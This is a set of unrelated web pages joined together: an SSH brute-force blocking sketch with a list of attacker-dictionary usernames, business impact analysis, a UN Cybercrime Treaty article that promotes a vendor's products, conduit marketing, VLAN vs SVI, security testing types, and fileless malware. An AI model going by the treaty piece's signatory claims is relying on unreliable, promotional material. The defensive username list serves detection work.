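The study's full matching logic is more sophisticated, but a minimal sketch of the dictionary-based idea might look like the following. The username lists, block duration, and allowlist here are illustrative assumptions, not the dictionaries used on CloudLab.

```python
import time

# Usernames harvested from known attacker dictionaries (illustrative subset).
ATTACK_DICT = {"root", "admin", "test", "oracle", "postgres", "ubnt", "pi"}
ALLOWLIST = {"alice", "bob"}        # legitimate local accounts (assumed)
BLOCK_SECONDS = 24 * 3600

blocked = {}                        # ip -> block expiry timestamp

def on_failed_login(ip: str, username: str) -> None:
    """Block an IP as soon as it tries a username from an attacker dictionary."""
    if username in ALLOWLIST:
        return                      # never punish typos on real accounts
    if username in ATTACK_DICT:
        blocked[ip] = time.time() + BLOCK_SECONDS

def is_blocked(ip: str) -> bool:
    expiry = blocked.get(ip)
    if expiry is None:
        return False
    if time.time() > expiry:
        del blocked[ip]             # block has expired
        return False
    return True

on_failed_login("203.0.113.7", "oracle")
print(is_blocked("203.0.113.7"))    # True
```

Unlike threshold-based tools such as Fail2ban, this approach can act on the very first attempt: the giveaway is which username was tried, not how many times.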
The research highlights the importance of secure practices like using key-based authentication and strong passwords. As attackers grow increasingly tenacious and innovative, novel defensive approaches will be essential to maintaining a safe internet ecosystem.
Disruptions can be devastating for businesses of all sizes and sectors.
From natural disasters to cyber attacks, a single incident can lead to a myriad of risks that can drastically disrupt operations, impact financial performance, and leave a company’s reputation in tatters.
The ability to withstand these challenges and maintain business continuity is critical to long-term success, so it’s important to understand what a worst-case scenario looks like so you can spring into action if needed.
That’s where a business impact analysis (BIA) comes in. BIA tells you what to expect when unforeseen roadblocks occur, so you can make a plan to get your business back on track as quickly as possible.
This article tells you everything you need to know about business impact analysis, including what it is, how it works, and why it’s important.
What is Business Impact Analysis (BIA)?
Business Impact Analysis (BIA) is a structured process used to identify and quantify the potential consequences of a disruption to critical business operations. This analysis helps organizations understand the potential financial, operational, and reputational risks associated with such disruptions.
A business impact analysis helps you predict the consequences of disruptions to business processes, so you have the data you need to proactively create recovery strategies. For example, a manufacturing company could create a BIA to measure how losing a key supplier would affect company operations and revenue.
BIA helps identify which processes, systems, and data are most critical to the business's survival, allowing organizations to allocate resources and focus on mitigating the most significant risks.
By understanding the potential consequences of disruptions, organizations can make informed decisions about their risk management strategies, including disaster recovery planning, insurance coverage, and business continuity plans.
Why is business impact analysis important?
In many industries, BIA is a regulatory requirement. It helps organizations demonstrate their commitment to risk management and compliance and is crucial for enabling them to respond appropriately when disruptive incidents strike.
A thorough BIA can help organizations become more resilient to disruptions, reducing the likelihood of significant financial losses and reputational damage.
It allows organizations to understand the potential impacts of disruptions so they can develop concrete incident response strategies to minimize downtime and recover quickly.
How does BIA work?
1. Identification of Critical Processes
The first step of BIA is to identify the processes that are essential for the organization's continued operations and survival. These processes are often referred to as "mission-critical" or "core business processes."
2. Assessment of Potential Disruptions
Once critical processes have been identified, organizations must assess the potential disruptions that could impact them. This includes natural disasters (e.g., hurricanes, earthquakes), human-caused incidents (e.g., cyber attacks, sabotage), and other factors (e.g., supply chain disruptions, economic downturns).
Once these threats have been identified, organizations must evaluate how each could disrupt the organization's critical business processes. This assessment helps organizations understand the range of potential threats they face and prioritize their risk mitigation efforts.
3. Quantification of Impact
For each potential disruption, organizations need to quantify the potential financial, operational, and reputational consequences. This may involve estimating the cost of lost revenue, increased expenses, damage to equipment, and damage to the organization's reputation.
By quantifying the impact of disruptions, organizations can prioritize risks, allocate resources effectively, and develop appropriate risk mitigation strategies.
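As a toy illustration of this step, the sketch below scores a few processes by estimated disruption impact and ranks them. The process names, dollar figures, and the reputational-weight multiplier are illustrative assumptions; real BIA numbers come from finance and operations teams.

```python
# (process name, downtime cost per hour in USD, estimated outage hours, reputational weight)
processes = [
    ("online-payments",  50_000,  8, 1.5),
    ("inventory-system", 12_000, 24, 1.1),
    ("internal-wiki",       500, 72, 1.0),
]

def impact_score(cost_per_hour: float, hours: float, rep_weight: float) -> float:
    """Direct financial loss scaled by reputational exposure."""
    return cost_per_hour * hours * rep_weight

ranked = sorted(processes, key=lambda p: impact_score(*p[1:]), reverse=True)
for name, cost, hours, rep in ranked:
    print(f"{name:18} estimated impact ${impact_score(cost, hours, rep):,.0f}")
```

Even this crude scoring makes the prioritization conversation concrete: online payments dwarfs the wiki, so it gets the recovery budget first.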
4. Setting Recovery Time Objectives (RTOs) and Recovery Point Objectives (RPOs)
RTOs and RPOs are essential elements of a Business Impact Analysis (BIA). They provide a quantitative measure of the acceptable levels of downtime and data loss for critical business processes, specifying how quickly the organization can restore operations after a disruption, and the maximum amount of data loss that can be tolerated.
Setting appropriate RTOs and RPOs is essential for developing effective disaster recovery and business continuity plans. Organizations must carefully consider the potential impact of downtime and data loss on their operations, reputation, and financial performance.
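A simple way to make RTOs and RPOs actionable is to check candidate recovery plans against them, as in the sketch below. The four-hour RTO and fifteen-minute RPO are assumed example objectives.

```python
from datetime import timedelta

RTO = timedelta(hours=4)      # maximum tolerable downtime (assumed)
RPO = timedelta(minutes=15)   # maximum tolerable data loss (assumed)

def plan_meets_objectives(restore_time: timedelta, backup_interval: timedelta) -> bool:
    """A plan is viable only if service is restored within the RTO and
    backups are frequent enough that at most an RPO's worth of data is lost."""
    return restore_time <= RTO and backup_interval <= RPO

print(plan_meets_objectives(timedelta(hours=3), timedelta(minutes=10)))   # True
print(plan_meets_objectives(timedelta(hours=6), timedelta(minutes=10)))   # False
```

A plan that fails either check sends the team back to invest in faster recovery or to negotiate looser objectives with the business.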
5. Development of Recovery Strategies
Based on the identified risks and recovery objectives, organizations can develop recovery strategies to minimize the impact of disruptions. These strategies are designed to minimize the negative consequences of disruptions and ensure that the organization can resume normal operations as quickly as possible.
The first step in developing recovery strategies is to identify the specific actions that need to be taken to restore critical processes. This may involve restoring data from backups, relocating operations to a secondary site, or procuring necessary supplies. Once these actions have been identified, organizations can develop detailed recovery plans that outline the steps involved, the resources required, and the responsibilities of different teams.
Organizations may also need to invest in redundant systems and processes to minimize the impact of disruptions, including having backup servers, multiple suppliers, and disaster recovery sites. By investing in these measures, organizations can reduce their reliance on a single point of failure and improve their resilience.
Business impact analysis vs risk assessment
While both BIA and risk assessment are essential components of risk management, they serve distinct purposes. A risk assessment identifies potential threats and vulnerabilities that could impact an organization. BIA, on the other hand, focuses on the consequences of these threats, quantifying the potential financial, operational, and reputational damages.
In essence, a risk assessment analysis identifies the "what" of risk, while BIA determines the "so what" by evaluating the potential impact of identified risks.
Examples of business impact analysis
1. Healthcare
A healthcare organization might conduct a BIA to assess the impact of a power outage on patient care, critical systems, and data security. This would involve identifying critical processes like patient monitoring, medication administration, and electronic health record systems. The BIA would help determine the potential consequences of a power outage, such as delayed treatments, loss of data, and increased costs.
2. Manufacturing
A manufacturing company could use BIA to evaluate the impact of a natural disaster, such as a hurricane, on its supply chain and production facilities. This would involve identifying critical suppliers, transportation routes, and manufacturing processes. The BIA would help determine the potential consequences of a disaster, such as production delays, increased costs, and damage to equipment.
3. Financial Services
A financial institution might conduct a BIA to assess the impact of a cyberattack on its customer data and operations. This would involve identifying critical systems like online banking, payment processing, and data storage. The BIA would help determine the potential consequences of a cyber attack, such as financial losses, reputational damage, and regulatory fines.
4. Retail
A retail company might use BIA to evaluate the impact of a major system failure on its sales and customer service. This would involve identifying critical systems like point-of-sale terminals, inventory management, and customer relationship management. The BIA would help determine the potential consequences of a system failure, such as lost sales, customer dissatisfaction, and operational disruptions.
In each of these examples, BIA helps organizations identify critical processes, assess potential disruptions, and quantify the potential consequences. This information can then be used to develop effective risk mitigation strategies and ensure business continuity.
Cybercrime Treaty at the UN: A New Era in Global Security
UN Cybersecurity Treaty Establishes Global Cooperation
The UN has taken a historic step by agreeing on the first-ever global cybercrime treaty. This significant agreement, outlined by the United Nations, demonstrates a commitment to enhancing global cybersecurity. The treaty paves the way for stronger international collaboration against the escalating threat of cyberattacks. As we examine this treaty's implications, it becomes clear why the decision is pivotal for the future of cybersecurity worldwide.
Cybercrime Treaty Addresses Global Cybersecurity Threats
As cyberattacks surge worldwide, UN member states have recognized the urgent need for collective action. This realization led to agreement on the groundbreaking Cybercrime Treaty text in August 2024. The treaty seeks to harmonize national laws and strengthen international cooperation. This effort enables countries to share information more effectively and coordinate actions against cybercriminals.
After years of intense negotiations, this milestone highlights the complexity of today’s digital landscape. Only a coordinated global response can effectively address these borderless threats.
Cybersecurity experts view this agreement as a crucial advancement in protecting critical infrastructures. Cyberattacks now target vital systems like energy, transportation, and public health. International cooperation is essential to anticipate and mitigate these threats before they cause irreparable harm.
For further details, you can access the official UN publication of the treaty here.
Drawing Parallels with the European AI Regulation
To grasp the full importance of the Cybercrime Treaty, we can compare it to the European Union’s initiative on artificial intelligence (AI). Like cybercrime, AI is a rapidly evolving field that presents new challenges in security, ethics, and regulation. The EU has committed to a strict legislative framework for AI, aiming to balance innovation with regulation. This approach protects citizens’ rights while promoting responsible technological growth.
In this context, the recent article on European AI regulation offers insights into how legislation can evolve to manage emerging technologies while ensuring global security. Similarly, the Cybercrime Treaty seeks to create a global framework that not only prevents malicious acts but also fosters essential international cooperation. As with AI regulation, the goal is to navigate uncharted territories, ensuring that legislation keeps pace with technological advancements while safeguarding global security.
A Major Step Toward Stronger Cybersecurity
This agreement marks a significant milestone, but it is only the beginning of a long journey toward stronger cybersecurity. Member states now need to ratify the treaty and implement measures at the national level. The challenge lies in the diversity of legal systems and approaches, which complicates standardization.
The treaty’s emphasis on protecting personal data is crucial. Security experts stress that fighting cybercrime must respect fundamental rights. Rigorous controls are essential to prevent abuses and ensure that cybersecurity measures do not become oppressive tools.
However, this agreement shows that the international community is serious about tackling cybercrime. The key objective now is to apply the treaty fairly and effectively while safeguarding essential rights like data protection and freedom of expression.
The Role of DataShielder and PassCypher Solutions in Individual Sovereignty and the Fight Against Cybercrime
As global cybercrime threats intensify, innovative technologies like DataShielder and PassCypher are essential for enhancing security while preserving individual sovereignty. These solutions, which operate without servers, databases, or user accounts, provide end-to-end anonymity and adhere to the principles of Zero Trust and Zero Knowledge.
- DataShielder NFC HSM: Utilizes NFC technology to secure digital transactions through strong authentication, preventing unauthorized access to sensitive information. It operates primarily within the Android ecosystem.
- DataShielder HSM PGP: Ensures the confidentiality and protection of communications by integrating PGP technology, thereby reinforcing users’ digital sovereignty. This solution is tailored for desktop environments, particularly on Windows and Mac systems.
- DataShielder NFC HSM Auth: Specifically designed to combat identity theft, this solution combines NFC and HSM technologies to provide secure and anonymous authentication. It operates within the Android NFC ecosystem, focusing on protecting the identity of order issuers against impersonation.
- PassCypher NFC HSM: Manages passwords and private keys for OTP 2FA (TOTP and HOTP), ensuring secure storage and access within the Android ecosystem. Like DataShielder, it functions without servers or databases, ensuring complete user anonymity.
- PassCypher HSM PGP: Features patented, fully automated technology to securely manage passwords and PGP keys, offering advanced protection for desktop environments on Windows and Mac. This solution can be seamlessly paired with PassCypher NFC HSM to extend security across both telephony and computer systems.
- PassCypher HSM PGP Gratuit: Offered freely in 13 languages, this solution integrates PGP technology to manage passwords securely, promoting digital sovereignty. Operating offline and adhering to Zero Trust and Zero Knowledge principles, it serves as a tool of public interest across borders. It can also be paired with PassCypher NFC HSM to enhance security across mobile and desktop platforms.
Global Alignment with UN Cybercrime Standards
Notably, many countries where DataShielder and PassCypher technologies are protected by international patents have already signed the UN Cybercrime Treaty. These nations include the USA, China, South Korea, Japan, the UK, Germany, France, Spain, and Italy. This alignment highlights the global relevance of these solutions, emphasizing their importance in meeting the cybersecurity standards now recognized by major global powers. This connection between patent protection and treaty participation further underscores the critical role these technologies play in the ongoing efforts to secure digital infrastructures worldwide.
DataShielder solutions can be classified as dual-use products, meaning they have both civilian and military applications. This classification aligns with international regulations, particularly those discussed in dual-use encryption regulations. These products, while enhancing cybersecurity, also comply with strict regulatory standards, ensuring they contribute to both individual sovereignty and broader national security interests.
Moreover, these products are available exclusively in France through AMG PRO, ensuring that they meet local market needs while maintaining global standards.
Human Rights Concerns Surrounding the Cybercrime Treaty
Human rights organizations have voiced strong concerns about the UN Cybercrime Treaty. Groups like Human Rights Watch and the Electronic Frontier Foundation (EFF) argue that the treaty’s broad scope lacks sufficient safeguards. They fear it could enable governments to misuse their authority, leading to excessive surveillance and restrictions on free speech, all under the guise of combating cybercrime.
These organizations warn that the treaty might be exploited to justify repressive actions, especially in countries where freedoms are already fragile. They are advocating for revisions to ensure stronger protections against such abuses.
The opinion piece on Euractiv highlights these concerns, warning that the treaty could become a tool for repression. Some governments might leverage it to enhance surveillance and limit civil liberties, claiming to fight cybercrime. Human rights defenders are calling for amendments to prevent the treaty from becoming a threat to civil liberties.
Global Reactions to the Cybercrime Treaty
Reactions to the Cybercrime Treaty have been varied, reflecting the differing priorities and concerns across nations. The United States and the European Union have shown strong support, stressing the importance of protecting personal data and citizens’ rights in the fight against cybercrime. They believe the treaty provides a critical framework for international cooperation, which is essential to combat the rising threat of cyberattacks.
However, Russia and China, despite signing the treaty, have expressed significant reservations. Russia, which initially supported the treaty, has recently criticized the final draft. Officials argue that the treaty includes too many human rights safeguards, which they believe could hinder national security measures. China has also raised concerns, particularly about digital sovereignty. They fear that the treaty might interfere with their control over domestic internet governance.
Meanwhile, countries in Africa and Latin America have highlighted the significant challenges they face in implementing the treaty. These nations have called for increased international support, both in resources and technical assistance, to develop the necessary cybersecurity infrastructure. This call for help underscores the disparity in technological capabilities between developed and developing nations. Such disparities could impact the treaty’s effectiveness on a global scale.
These varied reactions highlight the complexity of achieving global consensus on cybersecurity issues. As countries navigate their national interests, the need for international cooperation remains crucial. Balancing these factors will be essential as the global community moves forward with implementing the Cybercrime Treaty (UNODC) (euronews).
Broader Context: The Role of European Efforts and the Challenges of International Cooperation
While the 2024 UN Cybercrime Treaty represents a significant step forward in global cybersecurity, it is essential to understand it within the broader framework of existing international agreements. For instance, Article 62 of the UN treaty requires the agreement of at least 60 parties to implement additional protocols, such as those that could strengthen human rights protections. This requirement presents a challenge, especially considering that the OECD, a key international body, currently has only 38 members, making it difficult to gather the necessary consensus.
In Europe, there is already an established framework addressing cybercrime: the Budapest Convention of 2001, under the Council of Europe. This treaty, which is not limited to EU countries, has been a cornerstone in combating cybercrime across a broader geographic area. The Convention has been instrumental in setting standards for cooperation among signatory states.
Furthermore, an additional protocol to the Budapest Convention was introduced in 2022. This protocol aims to address contemporary issues in cybercrime, such as providing a legal basis for the disclosure of domain name registration information and enhancing cooperation with service providers. It also includes provisions for mutual assistance, immediate cooperation in emergencies, and crucially, safeguards for protecting personal data.
However, despite its importance, the protocol has not yet entered into force due to insufficient ratifications by member states. This delay underscores the difficulties in achieving widespread agreement and implementation in international treaties, even when they address pressing global issues like cybercrime.
Timeline from Initiative to Treaty Finalization
The timeline of the Cybercrime Treaty reflects the sustained effort required to address the growing cyber threats in an increasingly unstable global environment. Over five years, the negotiation process highlighted the challenges of achieving consensus among diverse nations, each with its own priorities and interests. This timeline provides a factual overview of the significant milestones:
- 2018: Initial discussions at the United Nations.
- 2019: Formation of a working group to assess feasibility.
- 2020: Proposal of the first draft, leading to extensive negotiations.
- 2021: Official negotiations involving cybersecurity experts and government representatives.
- 2023: Agreement on key articles; the final draft was submitted for review.
- 2024: Conclusion of the treaty text during the final session of the UN Ad Hoc Committee on August 8, 2024, in New York. The treaty is set to be formally adopted by the UN General Assembly later this year.
This timeline underscores the complexities and challenges faced during the treaty’s formation, setting the stage for understanding the diverse global responses to its implementation.
List of Treaty Signatories
The Cybercrime Treaty has garnered support from a coalition of countries committed to enhancing global cybersecurity. The current list of countries that have validated the agreement includes:
- United States
- China
- South Korea
- Japan
- United Kingdom
- Germany
- France
- Spain
- Italy
These countries reflect a broad consensus on the need for international cooperation against cybercrime. However, it is important to note that the situation is fluid, and other countries may choose to sign the treaty in the future as international and domestic considerations evolve.
Differentiating the EU’s Role from Member States’ Participation
It is essential to clarify that the European Union as a whole has not signed the UN Cybercrime Treaty. Instead, only certain individual EU member states, such as Germany, France, Spain, and Italy, have opted to sign the treaty independently. This means that while the treaty enjoys support from some key European countries, its enforcement and application will occur at the national level within these countries rather than under a unified EU framework.
This distinction is significant for several reasons. First, it highlights that the treaty will not be universally enforced across the entire European Union. Each signing member state will be responsible for integrating the treaty’s provisions into their own legal systems. Consequently, this could result in variations in how the treaty is implemented across different European countries.
Moreover, the European Union has its own robust cybersecurity policies and initiatives, including the General Data Protection Regulation (GDPR) and the EU Cybersecurity Act. The fact that the EU as an entity did not sign the treaty suggests that it may continue to rely on its existing frameworks for governing cybersecurity. At the same time, individual member states will address cybercrime through the treaty’s provisions.
Understanding this distinction is crucial for recognizing how international cooperation will be structured and the potential implications for cybersecurity efforts both within the EU and on a global scale.
Countries Yet to Sign the Cybercrime Treaty
Several countries have opted not to sign the Cybercrime Treaty, citing concerns related to sovereignty and national security. In a world marked by conflicts and global tensions, these nations prioritize maintaining control over their cybersecurity strategies rather than committing to international regulations. This list includes:
- Turkey: Concerns about national security and digital sovereignty.
- Iran: Fears of surveillance by more powerful states.
- Saudi Arabia: Reservations about alignment with national cyber policies.
- Israel: Prefers relying on its cybersecurity infrastructure, questioning enforceability.
- United Arab Emirates: Concerns about sovereignty and external control.
- Venezuela: Fear of foreign-imposed digital regulations.
- North Korea: Potential interference with state-controlled internet.
- Cuba: Concerns over state control and national security.
- Andorra: Has not signed the treaty, expressing caution over how it may impact national sovereignty and its control over digital governance and cybersecurity policies.
While these countries have not signed the treaty, the situation may change. International pressures, evolving cyber threats, and diplomatic negotiations could lead some of these nations to reconsider their positions and potentially sign the treaty in the future.
Download the Full Text of the UN Cybercrime Treaty
For those interested in reviewing the full text of the treaty, you can download it directly in various languages through the following links:
- EN: UN Cybercrime Treaty – English
- FR: UN Cybercrime Treaty – French
- AR: UN Cybercrime Treaty – Arabic
- CN: UN Cybercrime Treaty – Chinese
- ES: UN Cybercrime Treaty – Spanish
- RU: UN Cybercrime Treaty – Russian
These documents provide the complete and official text of the treaty, offering detailed insights into its provisions, objectives, and the framework for international cooperation against cybercrime.
A Global Commitment to a Common Challenge
As cyberattacks become increasingly sophisticated, the Cybercrime Treaty offers a much-needed global response to this growing threat. The UN’s agreement on this treaty marks a critical step toward enhancing global security. However, much work remains to ensure collective safety and effectiveness. Furthermore, concerns raised by human rights organizations, including Human Rights Watch and the Electronic Frontier Foundation, emphasize the need for vigilant monitoring. This careful oversight is crucial to prevent the treaty from being misused as a tool for repression and to ensure it upholds fundamental freedoms.
In this context, tools like DataShielder offer a promising way forward. These technologies enhance global cybersecurity efforts while simultaneously respecting individual and sovereign rights. They serve as a model for achieving robust security without infringing on the essential rights and freedoms that are vital to a democratic society. Striking this balance is increasingly important as we navigate deeper into a digital age where data protection and human rights are inextricably linked.
For additional insights on the broader implications of this global agreement, you can explore the UNRIC article on the Cybercrime Treaty. | <urn:uuid:bba1f114-3110-41ba-9c4a-6e5d0fd722c2> | CC-MAIN-2024-38 | https://freemindtronic.com/tag/global-cybersecurity/ | 2024-09-14T17:13:45Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651580.73/warc/CC-MAIN-20240914161327-20240914191327-00456.warc.gz | en | 0.91472 | 3,286 | 2.75 | 3 |
MicroTechnology is a term given to smaller conduits and fiber used in Inside and Outside Plant Construction (ISP and OSP). MicroDucts were developed as a solution to house fiber cables that were smaller in size, but still carried significant capacity. Today, MicroCables range from 6 to 432-fiber counts. The glass fibers are the same type as those used in traditional fiber cables, only the cable design has been altered to reduce the diameter of the cable sheath and support system. MicroDucts bundled under one sheath are called FuturePath and provide multiple ducts in one structure for future expansion of networks.
Dura-Line manufactures standard High Density Polyethylene (HDPE) conduits for standard installation applications such as standard underground, as innerducts in existing conduits, or corrugated products to use in congested areas. HDPE is a flexible and resilient material. It provides superior resistance to natural or mechanical damage, and has excellent low temperature properties to handle cold weather.
Dura-Line's Specialty Conduits are designed and manufactured to meet application-specific requirements such as aerial installation, locatability, superior mechanical protection, and use in fire-rated spaces. Customers using Specialty products leverage these unique characteristics for particular projects.
To complete your installation, Dura-Line offers a complete line of Accessories and additional tools to make installations easier. Couplers, with properties designed for air-jetting, plow chutes, and other installations, easily join lengths of Conduits and MicroDucts. Lubricants in a variety of formulations, including high performance in cold weather, aid in cable placement. MicroAccessories include couplers, end caps, and speciality items designed to perform with MicroDucts and FuturePath. Bull-Line Pull Tape can help install both conduit and cables inside conduit.
These Applications demonstrate how conduit is used in everyday life throughout our modern world. Considered an integral part of the construction phase, the long-term return on investment on installing a flexible, easily scalable conduit network system is priceless. Multiple industries rely on clear, consistent, reliable communication technology. Learn more about how Dura-Line products are integral in providing connection.
Dura-Line prides itself on creating cutting edge technology that solves unique customer installation scenarios. For nearly half a century, our team of experts has been hands-on involved in product research and installation training. In the Tech Center section, we share tips and techniques intended to help and engage engineers, installation crews, and end-users.
What is VLAN (Virtual Local Area Network)
A virtual LAN, or VLAN, is a broadcast domain that is segregated and isolated at the data link layer (OSI Layer 2). VLANs reduce the load on a network by keeping local traffic within a VLAN. However, because each VLAN is its own broadcast domain, a mechanism is needed for VLANs to pass data to other VLANs without sending that data through an external router.
The solution is the switched virtual interface (SVI).
Related – VLAN vs Subnet
What is SVI (Switched Virtual Interface)
An SVI is usually found on Layer 3 switches. With SVIs, the switch keeps packets whose destinations are local to the sending VLAN within that VLAN, and routes packets destined for different VLANs.
An SVI can be created for each VLAN that exists, but only one SVI can be mapped to each VLAN. An SVI is virtual, has no physical port defined, and performs the same functions for the VLAN as a router interface. An SVI is also called an interface VLAN.
Comparison Table: VLAN vs SVI
Below table summarizes the differences between the two:
| Parameter | SVI | VLAN |
| --- | --- | --- |
| Abbreviation for | Switched Virtual Interface | Virtual Local Area Network |
| Platform support | Configurable only on Layer 3 devices | Configurable on Layer 2 and Layer 3 devices |
| Routing across IP subnets | Can route between IP subnets | Cannot route between VLANs |
| Configuration command | interface vlan <VLAN ID> | vlan <VLAN ID> |
| OSI layer | Operates at Layer 3 of the OSI model | Operates at Layer 2 of the OSI model |
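To make the configuration rows above concrete, here is a minimal sketch for a Cisco IOS Layer 3 switch. The VLAN ID, name, and addressing are illustrative assumptions; adapt them to your own platform and network.

```
! Create the Layer 2 VLAN
vlan 10
 name ENGINEERING
!
! Create the SVI (interface VLAN) that serves as the default gateway for VLAN 10
interface vlan 10
 ip address 192.168.10.1 255.255.255.0
 no shutdown
!
! Enable inter-VLAN routing on the switch itself
ip routing
```

Hosts in VLAN 10 would then use 192.168.10.1 as their gateway, and the switch routes their traffic to the SVIs of other VLANs without a separate router.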
Are you preparing for your next interview?
If you want to learn more about VLAN, then check our e-book on VLAN System Interview Questions and Answers in easy to understand PDF Format explained with relevant Diagrams (where required) for better ease of understanding.
ABOUT THE AUTHOR
I am here to share my knowledge and experience in the field of networking with the goal being – “The more you share, the more you learn.”
I am a biotechnologist by qualification and a Network Enthusiast by interest. I developed interest in networking being in the company of a passionate Network Professional, my husband.
I am a strong believer of the fact that “learning is a constant process of discovering yourself.”
– Rashmi Bhardwaj (Author/Editor) | <urn:uuid:ce520e52-5459-4379-b7fb-e6c33dca4d8a> | CC-MAIN-2024-38 | https://ipwithease.com/vlan-vs-svi/ | 2024-09-15T23:14:25Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651668.26/warc/CC-MAIN-20240915220324-20240916010324-00356.warc.gz | en | 0.898707 | 543 | 3.4375 | 3 |
As a developer, you need to be familiar with various security measures to protect your applications from potential vulnerabilities. Among the security testing techniques that you need to be aware of are Static Application Security Testing (SAST), Dynamic Application Security Testing (DAST), Interactive Application Security Testing (IAST), and Runtime Application Self-Protection (RASP).
SAST: Static Application Security Testing
SAST is a type of security testing that analyzes an application’s source code or compiled bytecode to identify potential security vulnerabilities. SAST is usually performed in the early stages of software development, making it an essential tool for developers to prevent vulnerabilities from being introduced into the application’s code. The primary advantage of SAST is that it can detect vulnerabilities in the source code before the application is deployed.
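As an illustration, consider the kind of defect a SAST tool can flag purely by reading source code. The snippet below is a hypothetical Python example (the table and column names are made up): the first function concatenates user input into a SQL string, a classic injection pattern, while the second uses a parameterized query that a scanner would accept.

```python
import sqlite3

def find_user_unsafe(conn: sqlite3.Connection, username: str):
    # Flagged by SAST: untrusted input is interpolated directly into the SQL text,
    # so input like "x' OR '1'='1" changes the structure of the query (SQL injection)
    return conn.execute(f"SELECT * FROM users WHERE name = '{username}'").fetchall()

def find_user_safe(conn: sqlite3.Connection, username: str):
    # Passes review: the driver binds the value as data, never as SQL syntax
    return conn.execute("SELECT * FROM users WHERE name = ?", (username,)).fetchall()
```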
DAST: Dynamic Application Security Testing
DAST is a type of security testing that examines an application’s running state to identify vulnerabilities. It involves sending requests to the application to simulate real-world attacks and identify potential vulnerabilities. The primary advantage of DAST is that it can detect vulnerabilities in the application’s runtime environment that might have been missed by SAST.
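For contrast, a DAST tool exercises the running application from the outside. The sketch below is a deliberately simplified, hypothetical probe; the URL and parameter are assumptions, and a real scanner sends thousands of such requests and analyzes responses far more carefully. Only run probes like this against applications you own or are authorized to test.

```python
import urllib.parse
import urllib.request

TARGET = "http://localhost:8000/search"  # assumption: a locally running test app
PAYLOAD = "<script>alert(1)</script>"

# Send the crafted request to the live application, as a DAST scanner would
url = f"{TARGET}?{urllib.parse.urlencode({'q': PAYLOAD})}"
with urllib.request.urlopen(url, timeout=5) as resp:
    body = resp.read().decode(errors="replace")

# If the payload comes back unencoded, the page may be vulnerable to reflected XSS
print("possible reflected XSS" if PAYLOAD in body else "payload not reflected verbatim")
```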
IAST: Interactive Application Security Testing
IAST is a type of security testing that combines elements of both SAST and DAST. It examines the application’s running state like DAST, but it also provides more in-depth insights into the application’s code like SAST. IAST can detect vulnerabilities in the code as well as the runtime environment, making it an essential tool for developers to prevent vulnerabilities from being introduced into the code.
RASP: Runtime Application Self-Protection
RASP is a type of security testing that monitors an application’s runtime behavior to identify potential attacks and take appropriate action. It is usually deployed as an agent within the application’s runtime environment, allowing it to monitor and protect the application against various attacks. RASP can detect and block attacks in real-time, making it an essential tool for applications that handle sensitive data.
As a developer, you need to be familiar with various security testing techniques like SAST, DAST, IAST, and RASP. Each of these techniques has its strengths and weaknesses, and you need to determine which technique to use based on your application’s requirements. By being familiar with these techniques, you can better protect your application against potential vulnerabilities and provide a more secure experience for your users. | <urn:uuid:e546dcff-4560-4256-bd02-fb4ef3fafc3f> | CC-MAIN-2024-38 | https://cyberexperts.com/what-developers-need-to-know-about-sast-dast-iast-and-rasp/?utm_source=linkedin&utm_medium=social&utm_campaign=ReviveOldPost | 2024-09-18T10:42:36Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651895.12/warc/CC-MAIN-20240918100941-20240918130941-00156.warc.gz | en | 0.930815 | 509 | 3.078125 | 3 |
Malware is as old as computing itself. But as with all cyberthreats, it has evolved to be more effective and efficient. Fileless malware is one of the more pernicious threats to come along. In fact, it was identified as “the most common critical-severity cybersecurity threat to endpoints” for the first half of 2020.
What makes fileless malware so insidious is that it hides in a system’s RAM and effectively turns the computer’s operating system against the user by piggybacking on the tools that are part of their daily workflow. Worse, it thwarts traditional detection tools and methods because it has no identifiable code or signature.
Fileless malware is one of the most challenging threats businesses face today. Understanding what it is, how it works, and how to recognize such an attack is essential to mounting an effective defense.
[Related Reading: What Is Endpoint Security?]
What is Fileless Malware?
Finding malware exploits can sometimes feel like a game of Whac-A-Mole. No sooner is a malware signature identified, users notified, and patches applied, then a new exploit or a variation of an existing exploit appears.
What complicates things is that malware can also be “fileless.” There is no typical “.exe” binary file with a signature to be identified. Malware has typically used files that it makes resident on a target machine to carry out an attack, but a fileless malware attack does not touch the disk of the target. Instead, a hacker can leverage applications that are already installed on a computer, loading malicious code instructions only into memory.
Imagine opening a document that runs a macro or clicking on a website link to launch a video. That one action could cause, in one example, a malicious PowerShell script to be launched that might delete or damage files or launch the first stage of a more protracted and damaging attack.
The Rise of Fileless Malware
Fileless malware attacks aren’t new. In fact, this sort of malware has been seen for at least 15 years. The Lehigh virus was an example of this technique. The virus was carried in a maliciously altered DOS system file with the malicious code and the payload running in memory. It would run a command-line script to overwrite the boot sector of a machine, preventing the target from booting.
But recently there’s been an alarming rise in fileless malware exploits. Fileless attacks grew by 256 percent over the first half of 2019, and that trend has continued, with fileless malware responsible for 30 percent of all detected Indicators of compromise (IOCs) from January 1st to June 30th, 2020.
Businesses need to take this growing threat seriously because such attacks leave no detectable signature. Thus, they’re an ideal catalyst for advanced persistent threats where unauthorized users slip into a network unnoticed and implement their attack in phases over weeks or months to extract the maximum amount of data.
How Does Fileless Malware Work?
To understand fileless malware, it helps to contrast it with its more conventional form. In a typical malware attack, a user gets fooled into downloading an infected document or clicking a link to a fraudulent website, and a malicious file is written to the computer’s disk. That file can be detected during antivirus scanning, and it will leave a breadcrumb trail in the form of remnant code that you can follow to review its behavior and uncover any damage it may have done.
Fileless malware relies on stealth. Instead of writing a malicious file to disk, it hides in the system’s RAM where it can leverage authorized programs and processes to run its malicious code. Because antivirus tools look for file footprints and don’t scan memory directly, fileless attacks easily evade detection.
Like conventional malware attacks, a typical fileless attack starts with a user action. The user downloads an infected attachment or clicks on a malicious link. From there, an exploit kit scans the computer looking for vulnerabilities to gain entry into the system. Once inside, fileless malware hijacks whitelisted applications like Java, Microsoft Word, and Adobe Acrobat, or native tools like Windows Management Instrumentation and Microsoft PowerShell. PowerShell attacks are by far the most common, accounting for 89 percent of fileless malware attacks. In one notorious example, Operation Cobalt Kitty, PowerShell was used to target an Asian company for nearly six months after a spear-phishing email was used to infect over 40 PCs and servers.
